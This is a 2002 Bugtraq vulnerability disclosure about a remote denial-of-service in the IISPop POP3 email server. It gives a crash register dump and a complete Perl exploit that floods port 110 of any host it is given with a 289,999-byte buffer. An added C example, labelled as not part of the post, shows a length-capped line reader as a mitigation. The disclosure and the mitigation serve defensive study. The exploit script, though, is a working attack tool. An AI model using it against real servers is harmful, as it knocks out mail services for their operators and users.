[27879] in bugtraq


IISPop remote DOS

daemon@ATHENA.MIT.EDU (securma massine)
Fri Nov 15 15:15:23 2002

From: securma massine <securma@caramail.com>
To: bugtraq@securityfocus.com
Message-ID: <1037272315023222@caramail.com>
Mime-Version: 1.0
Date: Thu, 14 Nov 2002 12:11:55 GMT+1

hi

The IISPop EMail Server (http://www.curtiscomp.com/) was
designed for small networks. This is a POP3-only server,
designed to be paired with the SMTP server bundled in
Windows 2000/IIS 5.

I have found that IISPop is vulnerable to a DoS attack
caused by sending a large buffer (289999 bytes). This attack
gives the following register state (tested on v
1.161 and 1.181):

Access violation - code c0000005 (first chance)
eax=00000041 ebx=00407d3d ecx=00000101 edx=000021ae esi=0040693d edi=00437181
eip=77e76941 esp=0112ffb0 ebp=0000026c iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000206
KERNEL32!GetCurrentThreadId+4:
77e76941 0000 add [eax],al ds:0023:00000041=??

(unhandled exception in IISPop.exe (KERNEL32.DLL)
0xc0000005 : access violation)

exploit:
#!/usr/bin/perl -w
# tool : iispdos.pl
# shutdown all version of IISPop
# greetz crack.fr , marocit ,christal
#

use IO::Socket;

$ARGC = @ARGV;
if ($ARGC != 1) {
    print "\n-->";
    print "\tUsage: perl iispdos.pl <host> \n";
    exit;
}

$remo = $ARGV[0];
$buffer = "A" x 289999;

print "\n-->";
print "\tconnection with $remo\n";
unless ($so = IO::Socket::INET->new (Proto => "TCP",
                                     PeerAddr => $remo,
                                     PeerPort => "110"))
{
    print "-->";
    print "\tConnection Failed...\n";
    exit;
}
print $so "$buffer\n";
close $so;

print "-->";
print "\tnow test if the distant host is down\n";
exit;


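Added example, not part of the original post and not IISPop code: the post does not say where in IISPop the fault lies, so this only shows the server-side mitigation for the input it describes, a line reader that stops at a fixed command-line length instead of buffering an unbounded run of bytes. The names reader_feed, line_reader and POP3_MAX_LINE are hypothetical, and the 255-octet limit is taken from RFC 2449 as an assumption about what the server should enforce.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Assumed limit: RFC 2449 caps a POP3 command line at 255 octets, CRLF included. */
#define POP3_MAX_LINE 255

enum feed_result { NEED_MORE, LINE_READY, LINE_TOO_LONG };

struct line_reader {
    char   buf[POP3_MAX_LINE + 1]; /* completed line, NUL-terminated */
    size_t len;                    /* bytes of the line in progress */
};

/* Feed one chunk as read from the socket. Consumes input up to and including
 * the first LF and reports the count in *used so the caller can feed the rest.
 * LINE_TOO_LONG is returned before anything is written past buf; the caller
 * should answer -ERR and close instead of buffering further. */
enum feed_result reader_feed(struct line_reader *r, const char *data,
                             size_t n, size_t *used)
{
    for (size_t i = 0; i < n; i++) {
        if (data[i] == '\n') {
            if (r->len > 0 && r->buf[r->len - 1] == '\r')
                r->len--;                       /* drop the CR of CRLF */
            r->buf[r->len] = '\0';
            r->len = 0;                         /* ready for the next line */
            *used = i + 1;
            return LINE_READY;
        }
        if (r->len >= POP3_MAX_LINE - 1) {      /* no room left for byte + LF */
            *used = i;
            return LINE_TOO_LONG;
        }
        r->buf[r->len++] = data[i];
    }
    *used = n;
    return NEED_MORE;
}

int main(void)
{
    static char flood[289999];     /* constructed input, size taken from the post */
    struct line_reader r = { .len = 0 };
    size_t used;

    memset(flood, 'A', sizeof flood);
    enum feed_result res = reader_feed(&r, flood, sizeof flood, &used);
    printf("result=%d after %zu bytes\n", (int)res, used);
    return res == LINE_TOO_LONG ? 0 : 1;
}
```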

